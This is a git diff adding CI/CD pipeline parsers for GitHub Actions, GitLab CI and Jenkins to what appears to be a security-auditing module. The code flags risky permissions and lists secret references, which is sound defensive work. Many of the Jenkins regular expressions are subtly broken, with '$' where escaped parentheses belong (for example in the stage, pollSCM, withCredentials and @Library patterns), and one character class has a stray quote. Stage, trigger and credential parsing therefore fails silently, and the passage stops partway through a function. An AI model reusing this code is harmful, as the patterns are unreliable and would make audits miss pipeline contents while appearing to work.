+        scope: permissions === "write-all" ? "write-all" : "read-all",
+        location: filePath,
+        inherited: false,
+        risky: permissions === "write-all",
+        reason: permissions === "write-all" ? "Grants write access to all resources" : undefined,
+      })
+      return result
+    }
+
+    for (const [resource, scope] of Object.entries(permissions)) {
+      const normalizedScope = this.normalizeScope(scope)
+      const risky = CICDTypes.RISKY_PERMISSIONS.some(
+        (rp) => rp.resource === resource && (rp.scope === scope || scope === "write")
+      )
+      const riskyPerm = CICDTypes.RISKY_PERMISSIONS.find(
+        (rp) => rp.resource === resource && (rp.scope === scope || scope === "write")
+      )
+
+      result.push({
+        resource,
+        scope: normalizedScope,
+        location: filePath,
+        inherited: false,
+        risky,
+        reason: riskyPerm?.reason,
+      })
+    }
+
+    return result
+  }
+
+  private normalizeScope(scope: string): CICDTypes.PermissionScope {
+    switch (scope.toLowerCase()) {
+      case "read":
+        return "read"
+      case "write":
+        return "write"
+      case "admin":
+        return "admin"
+      case "none":
+        return "none"
+      default:
+        return "read"
+    }
+  }
+
+  private parseJob(
+    jobId: string,
+    job: GitHubJob,
+    content: string,
+    filePath: string
+  ): CICDTypes.PipelineJob {
+    const runsOn = Array.isArray(job["runs-on"])
+      ? job["runs-on"].join(", ")
+      : job["runs-on"]
+
+    const container = typeof job.container === "string"
+      ? job.container
+      : job.container?.image
+
+    const needs = Array.isArray(job.needs)
+      ? job.needs
+      : job.needs
+        ? [job.needs]
+        : []
+
+    const parsedJob: CICDTypes.PipelineJob = {
+      id: jobId,
+      name: ProviderUtils.normalizeJobName(job.name, jobId),
+      runsOn,
+      container,
+      permissions: this.parsePermissions(job.permissions, filePath),
+      steps: [],
+      env: ProviderUtils.parseEnvVars(job.env),
+      secrets: [],
+      needs,
+      condition: job.if,
+      line: ProviderUtils.getLineNumber(content, `${jobId}:`),
+    }
+
+    // Parse steps
+    if (job.steps) {
+      for (let i = 0; i < job.steps.length; i++) {
+        const step = job.steps[i]
+        parsedJob.steps.push(this.parseStep(step, i, content, filePath))
+      }
+    }
+
+    // Collect secrets from steps
+    for (const step of parsedJob.steps) {
+      parsedJob.secrets.push(
+        ...ProviderUtils.extractSecretsFromEnv(step.env, `${filePath}:${jobId}:${step.id}`)
+          .map((s) => s.name)
+      )
+    }
+
+    return parsedJob
+  }
+
+  private parseStep(
+    step: GitHubStep,
+    index: number,
+    content: string,
+    filePath: string
+  ): CICDTypes.PipelineStep {
+    const stepId = step.id || `step-${index + 1}`
+    const stepName = ProviderUtils.normalizeStepName(step.name, index)
+
+    let type: CICDTypes.PipelineStep["type"] = "run"
+    if (step.uses) {
+      type = step.uses.startsWith("actions/checkout") ? "checkout" : "uses"
+    }
+
+    const inputs: Record<string, string> = {}
+    if (step.with) {
+      for (const [key, value] of Object.entries(step.with)) {
+        inputs[key] = String(value)
+      }
+    }
+
+    // Find line number for this step
+    let line = 1
+    if (step.name) {
+      line = ProviderUtils.getLineNumber(content, `name: ${step.name}`)
+    } else if (step.uses) {
+      line = ProviderUtils.getLineNumber(content, `uses: ${step.uses}`)
+    } else if (step.run) {
+      line = ProviderUtils.getLineNumber(content, `run: `)
+    }
+
+    return {
+      id: stepId,
+      name: stepName,
+      type,
+      command: step.run,
+      action: step.uses,
+      env: ProviderUtils.parseEnvVars(step.env),
+      secrets: ProviderUtils.extractSecretsFromEnv(
+        ProviderUtils.parseEnvVars(step.env),
+        `${filePath}:${stepId}`
+      ).map((s) => s.name),
+      inputs,
+      line,
+    }
+  }
+
+  validate(pipeline: CICDTypes.PipelineConfig): string[] {
+    const errors: string[] = []
+
+    if (pipeline.jobs.length === 0) {
+      errors.push("Workflow has no jobs defined")
+    }
+
+    for (const job of pipeline.jobs) {
+      if (!job.runsOn && !job.container) {
+        errors.push(`Job '${job.id}' has no runs-on or container specified`)
+      }
+
+      if (job.steps.length === 0) {
+        errors.push(`Job '${job.id}' has no steps defined`)
+      }
+    }
+
+    return errors
+  }
+
+  extractActions(pipeline: CICDTypes.PipelineConfig): CICDTypes.ActionReference[] {
+    const actions: CICDTypes.ActionReference[] = []
+
+    for (const job of pipeline.jobs) {
+      for (const step of job.steps) {
+        if (step.action) {
+          actions.push(
+            ProviderUtils.parseActionReference(step.action, pipeline.path, step.line || 1)
+          )
+        }
+      }
+    }
+
+    return actions
+  }
+
+  extractSecrets(pipeline: CICDTypes.PipelineConfig): CICDTypes.SecretReference[] {
+    return pipeline.secrets
+  }
+
+  extractPermissions(pipeline: CICDTypes.PipelineConfig): CICDTypes.Permission[] {
+    const permissions: CICDTypes.Permission[] = [...pipeline.permissions]
+
+    for (const job of pipeline.jobs) {
+      for (const perm of job.permissions) {
+        if (!perm.inherited) {
+          permissions.push({
+            ...perm,
+            location: `${pipeline.path}:${job.id}`,
+          })
+        }
+      }
+    }
+
+    return permissions
+  }
+}
+
+/** Singleton instance */
+export const GitHubProvider = new GitHubActionsProvider()
diff --git a/packages/opencode/src/pentest/cicd/providers/gitlab.ts b/packages/opencode/src/pentest/cicd/providers/gitlab.ts
new file mode 100644
index 00000000000..91ee34fa3c0
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/providers/gitlab.ts
@@ -0,0 +1,420 @@
+/**
+ * @fileoverview GitLab CI/CD Provider
+ *
+ * Parser and analyzer for GitLab CI/CD configuration files.
+ */
+
+import * as yaml from "yaml"
+import { CICDTypes } from "../types"
+import { ProviderUtils } from "./base"
+import type { CICDProvider, ParseResult } from "./base"
+
+/** GitLab CI configuration structure */
+interface GitLabConfig {
+  stages?: string[]
+  variables?: Record<string, string | { value: string; description?: string }>
+  default?: GitLabDefault
+  include?: GitLabInclude | GitLabInclude[]
+  workflow?: GitLabWorkflow
+  [key: string]: unknown
+}
+
+interface GitLabDefault {
+  image?: string
+  before_script?: string[]
+  after_script?: string[]
+  tags?: string[]
+  artifacts?: GitLabArtifacts
+}
+
+interface GitLabInclude {
+  local?: string
+  project?: string
+  ref?: string
+  file?: string | string[]
+  remote?: string
+  template?: string
+}
+
+interface GitLabWorkflow {
+  rules?: GitLabRule[]
+}
+
+interface GitLabRule {
+  if?: string
+  when?: string
+  changes?: string[]
+  exists?: string[]
+}
+
+interface GitLabJob {
+  stage?: string
+  image?: string
+  script?: string | string[]
+  before_script?: string[]
+  after_script?: string[]
+  variables?: Record<string, string>
+  rules?: GitLabRule[]
+  only?: string[] | { refs?: string[]; changes?: string[] }
+  except?: string[] | { refs?: string[]; changes?: string[] }
+  tags?: string[]
+  needs?: (string | { job: string; artifacts?: boolean })[]
+  dependencies?: string[]
+  artifacts?: GitLabArtifacts
+  secrets?: Record<string, { vault: string }>
+  id_tokens?: Record<string, { aud: string }>
+}
+
+interface GitLabArtifacts {
+  paths?: string[]
+  reports?: Record<string, string | string[]>
+  expire_in?: string
+  when?: string
+}
+
+/** Reserved GitLab keywords that are not jobs */
+const RESERVED_KEYWORDS = [
+  "stages",
+  "variables",
+  "default",
+  "include",
+  "workflow",
+  "image",
+  "services",
+  "before_script",
+  "after_script",
+  "cache",
+  "pages",
+]
+
+export class GitLabCIProvider implements CICDProvider {
+  readonly provider: CICDTypes.Provider = "gitlab"
+  readonly patterns = [".gitlab-ci.yml", ".gitlab-ci.yaml", "*.gitlab-ci.yml"]
+
+  parse(content: string, filePath: string): ParseResult {
+    const errors: string[] = []
+    const warnings: string[] = []
+
+    try {
+      const config = yaml.parse(content) as GitLabConfig
+
+      if (!config || typeof config !== "object") {
+        return { success: false, errors: ["Invalid YAML: not an object"], warnings }
+      }
+
+      const pipeline: CICDTypes.PipelineConfig = {
+        id: ProviderUtils.generateId("gl"),
+        provider: "gitlab",
+        name: filePath.split("/").pop() || "gitlab-ci",
+        path: filePath,
+        raw: content,
+        triggers: this.parseTriggers(config),
+        jobs: [],
+        secrets: [],
+        permissions: [],
+        env: this.parseVariables(config.variables),
+        actions: [],
+        parsedAt: Date.now(),
+        parseErrors: [],
+      }
+
+      // Parse jobs (entries that aren't reserved keywords)
+      for (const [key, value] of Object.entries(config)) {
+        if (RESERVED_KEYWORDS.includes(key)) continue
+        if (key.startsWith(".")) continue // Hidden jobs/templates
+        if (typeof value !== "object" || value === null) continue
+
+        const job = value as GitLabJob
+        const parsedJob = this.parseJob(key, job, content, filePath, config.default)
+        pipeline.jobs.push(parsedJob)
+
+        // Collect secrets from job variables
+        if (job.variables) {
+          pipeline.secrets.push(
+            ...ProviderUtils.extractSecretsFromEnv(
+              this.parseJobVariables(job.variables),
+              `${filePath}:${key}`
+            )
+          )
+        }
+
+        // Collect vault secrets
+        if (job.secrets) {
+          for (const [secretName] of Object.entries(job.secrets)) {
+            pipeline.secrets.push({
+              name: secretName,
+              source: "variable",
+              location: `${filePath}:${key}`,
+              exposed: false,
+            })
+          }
+        }
+
+        // Check for ID tokens (OIDC)
+        if (job.id_tokens) {
+          pipeline.permissions.push({
+            resource: "id-token",
+            scope: "write",
+            location: `${filePath}:${key}`,
+            inherited: false,
+            risky: true,
+            reason: "Can request OIDC tokens for cloud authentication",
+          })
+        }
+      }
+
+      // Parse includes as dependencies
+      const includes = this.parseIncludes(config.include, filePath)
+      for (const inc of includes) {
+        pipeline.actions.push(inc)
+      }
+
+      // Deduplicate secrets
+      const secretMap = new Map<string, CICDTypes.SecretReference>()
+      for (const secret of pipeline.secrets) {
+        secretMap.set(secret.name, secret)
+      }
+      pipeline.secrets = Array.from(secretMap.values())
+
+      return { success: true, pipeline, errors, warnings }
+    } catch (err) {
+      errors.push(`YAML parse error: ${(err as Error).message}`)
+      return { success: false, errors, warnings }
+    }
+  }
+
+  private parseVariables(
+    variables: GitLabConfig["variables"]
+  ): Record<string, string> {
+    if (!variables) return {}
+
+    const result: Record<string, string> = {}
+    for (const [key, value] of Object.entries(variables)) {
+      if (typeof value === "string") {
+        result[key] = value
+      } else if (value && typeof value === "object" && "value" in value) {
+        result[key] = value.value
+      }
+    }
+    return result
+  }
+
+  private parseJobVariables(variables: Record<string, string>): Record<string, string> {
+    return { ...variables }
+  }
+
+  private parseTriggers(config: GitLabConfig): CICDTypes.PipelineTrigger[] {
+    const triggers: CICDTypes.PipelineTrigger[] = []
+
+    // Default trigger is push
+    triggers.push({
+      type: "push",
+      branches: [],
+      paths: [],
+      config: {},
+    })
+
+    // Parse workflow rules
+    if (config.workflow?.rules) {
+      for (const rule of config.workflow.rules) {
+        if (rule.if?.includes("merge_request")) {
+          triggers.push({
+            type: "merge_request",
+            branches: [],
+            paths: rule.changes || [],
+            config: { if: rule.if },
+          })
+        }
+        if (rule.if?.includes("$CI_PIPELINE_SOURCE") && rule.if.includes("schedule")) {
+          triggers.push({
+            type: "schedule",
+            branches: [],
+            paths: [],
+            config: { if: rule.if },
+          })
+        }
+      }
+    }
+
+    return triggers
+  }
+
+  private parseIncludes(
+    include: GitLabInclude | GitLabInclude[] | undefined,
+    filePath: string
+  ): CICDTypes.ActionReference[] {
+    const refs: CICDTypes.ActionReference[] = []
+
+    if (!include) return refs
+
+    const includes = Array.isArray(include) ? include : [include]
+
+    for (const inc of includes) {
+      if (inc.project) {
+        refs.push({
+          name: `${inc.project}${inc.file ? `:${Array.isArray(inc.file) ? inc.file[0] : inc.file}` : ""}`,
+          version: inc.ref,
+          pinned: false, // GitLab refs are typically branches, not SHAs
+          trusted: false,
+          file: filePath,
+          line: 1,
+          official: false,
+        })
+      } else if (inc.remote) {
+        refs.push({
+          name: inc.remote,
+          pinned: false,
+          trusted: false,
+          file: filePath,
+          line: 1,
+          official: false,
+        })
+      } else if (inc.template) {
+        refs.push({
+          name: `template:${inc.template}`,
+          pinned: true, // Templates are GitLab-managed
+          trusted: true,
+          file: filePath,
+          line: 1,
+          official: true,
+        })
+      }
+    }
+
+    return refs
+  }
+
+  private parseJob(
+    jobId: string,
+    job: GitLabJob,
+    content: string,
+    filePath: string,
+    defaultConfig?: GitLabDefault
+  ): CICDTypes.PipelineJob {
+    const parsedJob: CICDTypes.PipelineJob = {
+      id: jobId,
+      name: jobId,
+      runsOn: job.tags?.join(", "),
+      container: job.image || defaultConfig?.image,
+      permissions: [],
+      steps: [],
+      env: this.parseJobVariables(job.variables || {}),
+      secrets: [],
+      needs: this.parseNeeds(job.needs, job.dependencies),
+      condition: job.rules?.[0]?.if,
+      line: ProviderUtils.getLineNumber(content, `${jobId}:`),
+    }
+
+    // Convert script to steps
+    const scripts = this.normalizeScript(job.script)
+    const beforeScripts = job.before_script || defaultConfig?.before_script || []
+    const afterScripts = job.after_script || defaultConfig?.after_script || []
+
+    let stepIndex = 0
+
+    // Before scripts
+    for (const script of beforeScripts) {
+      parsedJob.steps.push({
+        id: `before-${stepIndex++}`,
+        name: `before_script ${stepIndex}`,
+        type: "script",
+        command: script,
+        env: {},
+        secrets: [],
+        inputs: {},
+      })
+    }
+
+    // Main scripts
+    for (const script of scripts) {
+      parsedJob.steps.push({
+        id: `script-${stepIndex++}`,
+        name: `script ${stepIndex}`,
+        type: "script",
+        command: script,
+        env: {},
+        secrets: [],
+        inputs: {},
+      })
+    }
+
+    // After scripts
+    for (const script of afterScripts) {
+      parsedJob.steps.push({
+        id: `after-${stepIndex++}`,
+        name: `after_script ${stepIndex}`,
+        type: "script",
+        command: script,
+        env: {},
+        secrets: [],
+        inputs: {},
+      })
+    }
+
+    return parsedJob
+  }
+
+  private normalizeScript(script: string | string[] | undefined): string[] {
+    if (!script) return []
+    if (typeof script === "string") return [script]
+    return script
+  }
+
+  private parseNeeds(
+    needs: GitLabJob["needs"],
+    dependencies: string[] | undefined
+  ): string[] {
+    const result: string[] = []
+
+    if (needs) {
+      for (const need of needs) {
+        if (typeof need === "string") {
+          result.push(need)
+        } else if (need && typeof need === "object") {
+          result.push(need.job)
+        }
+      }
+    }
+
+    if (dependencies) {
+      for (const dep of dependencies) {
+        if (!result.includes(dep)) {
+          result.push(dep)
+        }
+      }
+    }
+
+    return result
+  }
+
+  validate(pipeline: CICDTypes.PipelineConfig): string[] {
+    const errors: string[] = []
+
+    if (pipeline.jobs.length === 0) {
+      errors.push("GitLab CI config has no jobs defined")
+    }
+
+    for (const job of pipeline.jobs) {
+      if (job.steps.length === 0) {
+        errors.push(`Job '${job.id}' has no script defined`)
+      }
+    }
+
+    return errors
+  }
+
+  extractActions(pipeline: CICDTypes.PipelineConfig): CICDTypes.ActionReference[] {
+    return pipeline.actions
+  }
+
+  extractSecrets(pipeline: CICDTypes.PipelineConfig): CICDTypes.SecretReference[] {
+    return pipeline.secrets
+  }
+
+  extractPermissions(pipeline: CICDTypes.PipelineConfig): CICDTypes.Permission[] {
+    return pipeline.permissions
+  }
+}
+
+/** Singleton instance */
+export const GitLabProvider = new GitLabCIProvider()
diff --git a/packages/opencode/src/pentest/cicd/providers/index.ts b/packages/opencode/src/pentest/cicd/providers/index.ts
new file mode 100644
index 00000000000..bc00ff62cc1
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/providers/index.ts
@@ -0,0 +1,40 @@
+/**
+ * @fileoverview CI/CD Providers Index
+ *
+ * Exports all CI/CD pipeline configuration providers.
+ */
+
+export * from "./base"
+export { GitHubProvider, GitHubActionsProvider } from "./github"
+export { GitLabProvider, GitLabCIProvider } from "./gitlab"
+export { JenkinsProvider, JenkinsPipelineProvider } from "./jenkins"
+
+import { CICDTypes } from "../types"
+import type { CICDProvider } from "./base"
+import { GitHubProvider } from "./github"
+import { GitLabProvider } from "./gitlab"
+import { JenkinsProvider } from "./jenkins"
+
+/** Map of provider ID to provider instance */
+export const Providers: Record<CICDTypes.Provider, CICDProvider | undefined> = {
+  github: GitHubProvider,
+  gitlab: GitLabProvider,
+  jenkins: JenkinsProvider,
+  azure: undefined, // TODO: Implement Azure DevOps provider
+  circleci: undefined, // TODO: Implement CircleCI provider
+}
+
+/** Get a provider by ID */
+export function getProvider(provider: CICDTypes.Provider): CICDProvider | undefined {
+  return Providers[provider]
+}
+
+/** Get all implemented providers */
+export function getImplementedProviders(): CICDProvider[] {
+  return Object.values(Providers).filter((p): p is CICDProvider => p !== undefined)
+}
+
+/** Check if a provider is implemented */
+export function isProviderImplemented(provider: CICDTypes.Provider): boolean {
+  return Providers[provider] !== undefined
+}
diff --git a/packages/opencode/src/pentest/cicd/providers/jenkins.ts b/packages/opencode/src/pentest/cicd/providers/jenkins.ts
new file mode 100644
index 00000000000..e5fd03fac3c
--- /dev/null
+++ b/packages/opencode/src/pentest/cicd/providers/jenkins.ts
@@ -0,0 +1,576 @@
+/**
+ * @fileoverview Jenkins Pipeline Provider
+ *
+ * Parser and analyzer for Jenkinsfile (declarative and scripted pipelines).
+ */
+
+import { CICDTypes } from "../types"
+import { ProviderUtils } from "./base"
+import type { CICDProvider, ParseResult } from "./base"
+
+/** Stage structure from parsed Jenkinsfile */
+interface JenkinsStage {
+  name: string
+  agent?: JenkinsAgent
+  environment?: Record<string, string>
+  steps: JenkinsStep[]
+  when?: string
+  parallel?: JenkinsStage[]
+}
+
+interface JenkinsAgent {
+  type: "any" | "none" | "label" | "docker" | "dockerfile" | "kubernetes"
+  label?: string
+  image?: string
+  args?: string
+}
+
+interface JenkinsStep {
+  type: string
+  args?: string
+  block?: JenkinsStep[]
+  name?: string
+}
+
+export class JenkinsPipelineProvider implements CICDProvider {
+  readonly provider: CICDTypes.Provider = "jenkins"
+  readonly patterns = ["Jenkinsfile", "Jenkinsfile.*", "jenkins/*.groovy", ".jenkins/*.groovy"]
+
+  parse(content: string, filePath: string): ParseResult {
+    const errors: string[] = []
+    const warnings: string[] = []
+
+    try {
+      // Determine pipeline type
+      const isDeclarative = content.includes("pipeline {")
+      const isScripted = content.includes("node {") || content.includes("node(")
+
+      if (!isDeclarative && !isScripted) {
+        warnings.push("Could not determine pipeline type, assuming declarative")
+      }
+
+      const pipeline: CICDTypes.PipelineConfig = {
+        id: ProviderUtils.generateId("jk"),
+        provider: "jenkins",
+        name: filePath.split("/").pop() || "Jenkinsfile",
+        path: filePath,
+        raw: content,
+        triggers: this.parseTriggers(content),
+        jobs: [],
+        secrets: [],
+        permissions: [],
+        env: this.parseEnvironment(content),
+        actions: [],
+        parsedAt: Date.now(),
+        parseErrors: [],
+      }
+
+      if (isDeclarative) {
+        const stages = this.parseDeclarativeStages(content)
+        for (const stage of stages) {
+          pipeline.jobs.push(this.stageToJob(stage, content, filePath))
+        }
+
+        // Parse global agent
+        const globalAgent = this.parseAgent(content)
+        if (globalAgent?.image) {
+          pipeline.jobs.forEach((job) => {
+            if (!job.container) job.container = globalAgent.image
+          })
+        }
+      } else if (isScripted) {
+        const stages = this.parseScriptedStages(content)
+        for (const stage of stages) {
+          pipeline.jobs.push(this.stageToJob(stage, content, filePath))
+        }
+      }
+
+      // Extract credentials/secrets
+      pipeline.secrets = this.extractCredentials(content, filePath)
+
+      // Extract shared libraries as dependencies
+      pipeline.actions = this.parseSharedLibraries(content, filePath)
+
+      return { success: true, pipeline, errors, warnings }
+    } catch (err) {
+      errors.push(`Parse error: ${(err as Error).message}`)
+      return { success: false, errors, warnings }
+    }
+  }
+
+  private parseTriggers(content: string): CICDTypes.PipelineTrigger[] {
+    const triggers: CICDTypes.PipelineTrigger[] = []
+
+    // Default: SCM trigger
+    triggers.push({
+      type: "commit",
+      branches: [],
+      paths: [],
+      config: {},
+    })
+
+    // Parse triggers block
+    const triggersMatch = content.match(/triggers\s*\{([^}]+)\}/s)
+    if (triggersMatch) {
+      const triggersBlock = triggersMatch[1]
+
+      // pollSCM
+      if (triggersBlock.includes("pollSCM")) {
+        const cronMatch = triggersBlock.match(/pollSCM\s*$\s*['"]([^'"]+)['"]\s*$/)
+        triggers.push({
+          type: "schedule",
+          branches: [],
+          paths: [],
+          config: { cron: cronMatch?.[1] },
+        })
+      }
+
+      // cron
+      if (triggersBlock.includes("cron(")) {
+        const cronMatch = triggersBlock.match(/cron\s*$\s*['"]([^'"]+)['"]\s*$/)
+        triggers.push({
+          type: "schedule",
+          branches: [],
+          paths: [],
+          config: { cron: cronMatch?.[1] },
+        })
+      }
+
+      // upstream
+      if (triggersBlock.includes("upstream(")) {
+        triggers.push({
+          type: "pipeline",
+          branches: [],
+          paths: [],
+          config: { type: "upstream" },
+        })
+      }
+    }
+
+    return triggers
+  }
+
+  private parseEnvironment(content: string): Record<string, string> {
+    const env: Record<string, string> = {}
+
+    // Parse environment block
+    const envMatch = content.match(/environment\s*\{([^}]+)\}/s)
+    if (envMatch) {
+      const envBlock = envMatch[1]
+      const varPattern = /(\w+)\s*=\s*(?:['"]([^'"]*)['"']|(\S+))/g
+      let match
+      while ((match = varPattern.exec(envBlock)) !== null) {
+        env[match[1]] = match[2] || match[3] || ""
+      }
+    }
+
+    return env
+  }
+
+  private parseAgent(content: string): JenkinsAgent | undefined {
+    // Parse global agent
+    const agentMatch = content.match(/agent\s*\{([^}]+)\}/s)
+    if (!agentMatch) {
+      // Check for simple agent
+      const simpleAgent = content.match(/agent\s+(any|none)/)
+      if (simpleAgent) {
+        return { type: simpleAgent[1] as "any" | "none" }
+      }
+      return undefined
+    }
+
+    const agentBlock = agentMatch[1]
+
+    // Docker agent
+    const dockerMatch = agentBlock.match(/docker\s*\{([^}]+)\}/s) ||
+                       agentBlock.match(/docker\s+['"]([^'"]+)['"]/)
+    if (dockerMatch) {
+      const imageMatch = dockerMatch[1].match(/image\s+['"]([^'"]+)['"]/) ||
+                        [null, dockerMatch[1]]
+      return {
+        type: "docker",
+        image: imageMatch?.[1],
+      }
+    }
+
+    // Label agent
+    const labelMatch = agentBlock.match(/label\s+['"]([^'"]+)['"]/)
+    if (labelMatch) {
+      return { type: "label", label: labelMatch[1] }
+    }
+
+    // Kubernetes agent
+    if (agentBlock.includes("kubernetes")) {
+      const yamlMatch = agentBlock.match(/yaml\s+['"]([^'"]+)['"]/)
+      return { type: "kubernetes", args: yamlMatch?.[1] }
+    }
+
+    return { type: "any" }
+  }
+
+  private parseDeclarativeStages(content: string): JenkinsStage[] {
+    const stages: JenkinsStage[] = []
+
+    // Find stages block
+    const stagesMatch = content.match(/stages\s*\{([\s\S]*?)\n\s{4}\}/m)
+    if (!stagesMatch) return stages
+
+    // Parse individual stages
+    const stagePattern = /stage\s*$\s*['"]([^'"]+)['"]\s*$\s*\{/g
+    let match
+    const stagePositions: { name: string; start: number }[] = []
+
+    while ((match = stagePattern.exec(stagesMatch[1])) !== null) {
+      stagePositions.push({ name: match[1], start: match.index })
+    }
+
+    for (let i = 0; i < stagePositions.length; i++) {
+      const stageName = stagePositions[i].name
+      const start = stagePositions[i].start
+      const end = i + 1 < stagePositions.length
+        ? stagePositions[i + 1].start
+        : stagesMatch[1].length
+
+      const stageContent = stagesMatch[1].slice(start, end)
+
+      stages.push({
+        name: stageName,
+        steps: this.parseSteps(stageContent),
+        environment: this.parseStageEnvironment(stageContent),
+        when: this.parseWhen(stageContent),
+      })
+    }
+
+    return stages
+  }
+
+  private parseScriptedStages(content: string): JenkinsStage[] {
+    const stages: JenkinsStage[] = []
+
+    // Parse stage() calls in scripted pipeline
+    const stagePattern = /stage\s*$\s*['"]([^'"]+)['"]\s*$\s*\{/g
+    let match
+
+    while ((match = stagePattern.exec(content)) !== null) {
+      const stageName = match[1]
+      const stageStart = match.index + match[0].length
+      const stageEnd = this.findMatchingBrace(content, stageStart - 1)
+      const stageContent = content.slice(stageStart, stageEnd)
+
+      stages.push({
+        name: stageName,
+        steps: this.parseScriptedSteps(stageContent),
+      })
+    }
+
+    return stages
+  }
+
+  private parseSteps(stageContent: string): JenkinsStep[] {
+    const steps: JenkinsStep[] = []
+
+    // Find steps block
+    const stepsMatch = stageContent.match(/steps\s*\{([\s\S]*?)\n\s{12}\}/m) ||
+                      stageContent.match(/steps\s*\{([\s\S]*?)\}/s)
+    if (!stepsMatch) return steps
+
+    const stepsContent = stepsMatch[1]
+
+    // Parse sh steps
+    const shPattern = /sh\s+(?:['"]([^'"]+)['"]|'''([\s\S]*?)'''|"""([\s\S]*?)""")/g
+    let match
+    while ((match = shPattern.exec(stepsContent)) !== null) {
+      steps.push({
+        type: "sh",
+        args: match[1] || match[2] || match[3],
+        name: "Shell command",
+      })
+    }
+
+    // Parse bat steps
+    const batPattern = /bat\s+(?:['"]([^'"]+)['"]|'''([\s\S]*?)''')/g
+    while ((match = batPattern.exec(stepsContent)) !== null) {
+      steps.push({
+        type: "bat",
+        args: match[1] || match[2],
+        name: "Batch command",
+      })
+    }
+
+    // Parse echo steps
+    const echoPattern = /echo\s+['"]([^'"]+)['"]/g
+    while ((match = echoPattern.exec(stepsContent)) !== null) {
+      steps.push({
+        type: "echo",
+        args: match[1],
+        name: "Echo",
+      })
+    }
+
+    // Parse script blocks
+    const scriptPattern = /script\s*\{([\s\S]*?)\}/g
+    while ((match = scriptPattern.exec(stepsContent)) !== null) {
+      steps.push({
+        type: "script",
+        args: match[1],
+        name: "Groovy script",
+      })
+    }
+
+    // Parse withCredentials blocks
+    const credPattern = /withCredentials\s*$\s*\[([\s\S]*?)\]\s*$\s*\{/g
+    while ((match = credPattern.exec(stepsContent)) !== null) {
+      steps.push({
+        type: "withCredentials",
+        args: match[1],
+        name: "Credentials block",
+      })
+    }
+
+    return steps
+  }
+
+  private parseScriptedSteps(stageContent: string): JenkinsStep[] {
+    // Similar to parseSteps but for scripted pipeline
+    return this.parseSteps(`steps { ${stageContent} }`)
+  }
+
+  private parseStageEnvironment(stageContent: string): Record<string, string> | undefined {
+    const envMatch = stageContent.match(/environment\s*\{([^}]+)\}/s)
+    if (!envMatch) return undefined
+
+    const env: Record<string, string> = {}
+    const varPattern = /(\w+)\s*=\s*(?:['"]([^'"]*)['"']|(\S+))/g
+    let match
+    while ((match = varPattern.exec(envMatch[1])) !== null) {
+      env[match[1]] = match[2] || match[3] || ""
+    }
+    return env
+  }
+
+  private parseWhen(stageContent: string): string | undefined {
+    const whenMatch = stageContent.match(/when\s*\{([^}]+)\}/s)
+    if (!whenMatch) return undefined
+    return whenMatch[1].trim()
+  }
+
+  private findMatchingBrace(content: string, start: number): number {
+    let depth = 0
+    for (let i = start; i < content.length; i++) {
+      if (content[i] === "{") depth++
+      if (content[i] === "}") {
+        depth--
+        if (depth === 0) return i
+      }
+    }
+    return content.length
+  }
+
+  private stageToJob(
+    stage: JenkinsStage,
+    content: string,
+    filePath: string
+  ): CICDTypes.PipelineJob {
+    const job: CICDTypes.PipelineJob = {
+      id: stage.name.toLowerCase().replace(/\s+/g, "-"),
+      name: stage.name,
+      runsOn: stage.agent?.label,
+      container: stage.agent?.image,
+      permissions: [],
+      steps: stage.steps.map((step, i) => ({
+        id: `step-${i + 1}`,
+        name: step.name || step.type,
+        type: this.mapStepType(step.type),
+        command: step.args,
+        env: {},
+        secrets: [],
+        inputs: {},
+      })),
+      env: stage.environment || {},
+      secrets: [],
+      needs: [],
+      condition: stage.when,
+      line: ProviderUtils.getLineNumber(content, `stage('${stage.name}')`),
+    }
+
+    return job
+  }
+
+  private mapStepType(jenkinsType: string): CICDTypes.PipelineStep["type"] {
+    const mapping: Record<string, CICDTypes.PipelineStep["type"]> = {
+      sh: "shell",
+      bat: "shell",
+      script: "script",
+      checkout: "checkout",
+      withCredentials: "run",
+    }
+    return mapping[jenkinsType] || "run"
+  }
+
+  private extractCredentials(
+    content: string,
+    filePath: string
+  ): CICDTypes.SecretReference[] {
+    const secrets: CICDTypes.SecretReference[] = []
+
+    // Parse withCredentials blocks
+    const credPattern = /withCredentials\s*$\s*\[([\s\S]*?)\]\s*$/g
+    let match
+    while ((match = credPattern.exec(content)) !== null) {
+      const credBlock = match[1]
+
+      // string() credentials
+      const stringCreds = credBlock.match(/string\s*\([^)]*credentialsId:\s*['"]([^'"]+)['"]/g)
+      if (stringCreds) {
+        for (const cred of stringCreds) {
+          const idMatch = cred.match(/credentialsId:\s*['"]([^'"]+)['"]/)
+          if (idMatch) {
+            secrets.push({
+              name: idMatch[1],
+              source: "variable",
+              location: filePath,
+              exposed: false,
+            })
+          }
+        }
+      }
+
+      // usernamePassword() credentials
+      const userPassCreds = credBlock.match(/usernamePassword\s*\([^)]*credentialsId:\s*['"]([^'"]+)['"]/g)
+      if (userPassCreds) {
+        for (const cred of userPassCreds) {
+          const idMatch = cred.match(/credentialsId:\s*['"]([^'"]+)['"]/)
+          if (idMatch) {
+            secrets.push({
+              name: idMatch[1],
+              source: "variable",
+              location: filePath,
+              exposed: false,
+            })
+          }
+        }
+      }
+
+      // file() credentials
+      const fileCreds = credBlock.match(/file\s*\([^)]*credentialsId:\s*['"]([^'"]+)['"]/g)
+      if (fileCreds) {
+        for (const cred of fileCreds) {
+          const idMatch = cred.match(/credentialsId:\s*['"]([^'"]+)['"]/)
+          if (idMatch) {
+            secrets.push({
+              name: idMatch[1],
+              source: "file",
+              location: filePath,
+              exposed: false,
+            })
+          }
+        }
+      }
+
+      // sshUserPrivateKey() credentials
+      const sshCreds = credBlock.match(/sshUserPrivateKey\s*$[^)]*credentialsId:\s*['"]([^'"]+)['"]/g)
+      if (sshCreds) {
+        for (const cred of sshCreds) {
+          const idMatch = cred.match(/credentialsId:\s*['"]([^'"]+)['"]/)
+          if (idMatch) {
+            secrets.push({
+              name: idMatch[1],
+              source: "file",
+              location: filePath,
+              exposed: false,
+            })
+          }
+        }
+      }
+    }
+
+    // Parse environment credentials
+    const envCredPattern = /credentials\s*\(\s*['"]([^'"]+)['"]\s*$/g
+    while ((match = envCredPattern.exec(content)) !== null) {
+      secrets.push({
+        name: match[1],
+        source: "env",
+        location: filePath,
+        exposed: false,
+      })
+    }
+
+    return secrets
+  }
+
+  private parseSharedLibraries(
+    content: string,
+    filePath: string
+  ): CICDTypes.ActionReference[] {
+    const libs: CICDTypes.ActionReference[] = []
+
+    // Parse @Library annotations
+    const libPattern = /@Library\s*$\s*(?:['"]([^'"]+)['"]|\[([^\]]+)\])\s*$/g
